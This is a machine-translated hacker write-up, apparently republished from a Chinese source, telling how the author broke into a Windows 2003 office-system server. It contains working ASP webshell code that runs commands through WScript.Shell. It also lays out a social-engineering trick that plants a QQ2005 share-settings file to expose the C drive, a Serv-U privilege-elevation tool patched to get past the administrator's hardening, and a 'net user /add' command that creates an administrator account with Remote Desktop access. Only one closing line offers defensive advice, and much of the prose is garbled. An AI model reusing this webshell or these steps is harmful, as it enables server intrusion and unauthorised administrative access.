Third-party software running on the server has historically been viewed by attackers as a shortcut to an intrusion target system. Now, the famous Tencent QQ has been included in these shortcuts list, fortunately, QQ is not a prerequisite for server software, so I believe that will not cause a large range of the crisis. The article encountered special circumstances, although not many, but we should follow the "possible should be on guard" principle to make corresponding defense.
First, the Webshell in the Windows2003
The goal of this infiltration is an OA Office System server. Its operating system has recently upgraded to Windows2003, but OA still exists ASP file upload loophole, so Webshell's acquisition and no suspense.
The obstacle is encountered in the elevation of privilege--
Login Webshell found that only the server's D disk can be viewed, no access to C disk, Webshell is "no permissions." This is expected, because Wenshell only guests group permissions, plus win2003 by default prohibit the "Everyone" anonymous user and the "Guest" group permissions users access to Cmd.exe, also caused the Webshell can not run through Cmd.exe.
The only thing to be thankful for is the use of Webshell to read and write to the various subdirectories of D disk (which holds the Web virtual directory). Here in addition to the Web virtual directory there are some data backup files and a Tencent QQ installation directory Tencent.
Second, to crack the ultimate prevention of Serv-u
WINDOWS2003 's various default security configurations show its powerful side, and it seems unlikely that it will be possible to elevate existing permissions in the near term until I feel a glimmer of hope when I try to send an FTP link request to this server from the system and see Serv-u's banner.
As mentioned earlier in the article "Building a Windows2003 bastion host" in the line of defense of the 2004 6, the assertion that because of the Windows2003 restrictions on Cmd.exe, and the Webshell way to run Cmd.exe, has been mentioned, but practice shows that this is not true, Through the Webshell upload the cmd.exe files of the local non-2003 system to the executable directory, and then through the WScript component, can also Windows2003 the cmd.exe of the corresponding permission through the Webshell way. Combined with Nc.exe, you can even get a shell under the command line of the Guest group permission.
To this end, I made some improvements to the veteran Webmaster Assistant 6.0, adding the following code to enable it to run the locally uploaded cmd.exe using the Wscript.Shell component.
Function Cmdshell ()
If request ("SP") <> "Then session (" Shellpath ") = Request (" SP ")
Shellpath=session ("Shellpath")
If shellpath= "" Then Shellpath = "cmd.exe"
If Request ("wscript") = "yes" then
Checked= "Checked"
Else
Checked= ""
End If
If request ("cmd") <> "Then defcmd = Request (" cmd ")
Si= "<form method=post><input name=cmd style=width:92% class=cmd value=" &DefCmd& ">< Input Type=submit value= Run > "
si=si& "<textarea style=width:100%;height:500; class=cmd>"
If request.form ("cmd") <> "Then"
If Request.Form ("wscript") = "yes" then
Set Cm=createobject (ObT (1,0))
Set dd=cm.exec (shellpath& "/C" &defcmd)
Aaa=dd.stdout.readall
Si=si&aaa
Else%>
<object runat=server id=ws scope=page classid= "Clsid:72c24dd5-d70a-438b-8a42-98424b88afb8" ></object>
<object runat=server id=ws scope=page classid= "clsid:f935dc22-1cf0-11d0-adb9-00c04fd58a0b" ></object>
<object runat=server id=fso scope=page classid= "clsid:0d43fe01-f093-11cf-8940-00a0c9054228" ></object>
<%sztempfile = Server.MapPath ("Cmd.txt")
Call WS. Run (shellpath& "/C" & Defcmd & ">" & Sztempfile, 0, True)
Set fs = CreateObject ("Scripting.FileSystemObject")
Set OFILELCX = fs. OpenTextFile (Sztempfile, 1, False, 0)
Aaa=server.htmlencode (Ofilelcx.readall)
Ofilelcx.close
Call FSO. DeleteFile (Sztempfile, True)
Si=si&aaa
End If
End If
SI=SI&CHR (& "</textarea>")
si=si& "Shell path: <input name=sp value=" &ShellPath& "style=width:70%>"
si=si& "<input type=checkbox name=wscript value=yes" &checked& ">WScript.Shell</form>"
Response.Write SI
End Function
When you use it, you specify the cmd.exe path in the shell path, and then select the option WScript to run some of the less privileged system commands, such as "net start" or "Netstat-an", after which you run the two commands Webshell echo many services , including serv-u FTP server, and 43958 ports in the active port list, I naturally thought of the powerful serv-u FTP server local privilege elevation vulnerability. The FTP local privilege elevation tool that you can actually use when executing system commands, there are 530 error prompts (Figure 1). It appears that the administrator or someone else has made a pudding or some security configuration for serv-u. In order to know exactly what kind of security configuration, the Internet check the relevant articles, including a "serv-u ftp Server local privilege to enhance the ultimate prevention of vulnerability" is very popular, is reproduced in many ways, the author is an expert Xiaolu. From the error hint it is possible to do the so-called ultimate prevention, that is, the default administrator or password in the ServUDaemon.exe is modified. Of course, this is only to assume that only the target server ServUDaemon.exe download down to see the specific configuration can be determined, but the installation of Serv-u C disk prohibit access, including programe files directory, permission to upgrade again blocked.
Third, the use of QQ2005 share file vulnerabilities to enhance the right to the end
Flip the D disk again and see the Tencent folder that is rarely seen in the server. View Whatsnew.txt.
learned that the version of QQ is QQ2005 Beta1, several of the relevant file creation time also shows that the network management recently landed on the server QQ. Can only use QQ? After some thinking, finally think of a can be used QQ2005 in the file sharing function of a vulnerability.
The flaw comes with the new QQ2005 version. The harm can be described as: exploiting this vulnerability allows an attacker to browse and read arbitrary files in the user's system (such as Sam files, data backup files, sensitive information files). Impact System: Install the QQ2005 lunar version of all the Windows series operating system.
The concrete use method is: First in this machine login own QQ, bring up "QQ menu", select tool-> set share, designate C:\ or any other use value partition for share file, close QQ after completion, find installation directory under QQ account name folder "Shareinfo.db" File. As shown in Figure 3. , the upload overwrites the same file on the target server (e.g. D:\Tencent\QQ\654321\ShareInfo.db). In this way, when the network administrator landing QQ on the server will be open to friends C disk for the shared directory.
Because a stranger cannot share a file, a social engineering application is needed to add the administrator as a friend (the reason is, of course, the more trustworthy the better). If the administrator through the request, the server's C disk will be shared in the name of the QQ file directory, the original can not be accessed through the Webshell ServUDaemon.exe files can be downloaded, encountered obstacles to the path of elevation and can continue.
That night the administrator passed the application and added me as a friend. Coral QQ on the display of IP is the target server IP, so downloaded the ServUDaemon.exe file, with the UE opened to find 127.0.0.1, found that the default configuration under the built-in account "Localadministrator" was changed to " Localadministruser ". This looks like a very "ultimate" defense, however, the proposed method of Xiaolu does not seem to carry out offensive and defensive needs of the transposition of the public to publish it, to know that the attacker only need to know the modified configuration, and the local authority to improve the use of tools to modify the corresponding, the so-called ultimate defense is breached. method or using UE to open the shell of the Serv-u local authority to enhance the use of the tool, the localadministrator changed to Localadministruser can be.
Then upload the modified Ftp2.exe, Wscript.Shell in the D:\web\ftp2.exe "net user user Password/add" after looking at the results, has successfully added a user. The user is then joined to the Administrators group and the Remote Desktop Users group to log on to the destination server's desktop.
--through the many dangers, finally completely captured this sturdy Windows2003 fortress.
Four, simple revelation
As can be seen, and "less service security", the server running "third party" the less the more secure, popular pcanywhere, VNC, serv-u privilege elevation and here the use of QQ2005 elevation permissions, can be avoided
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
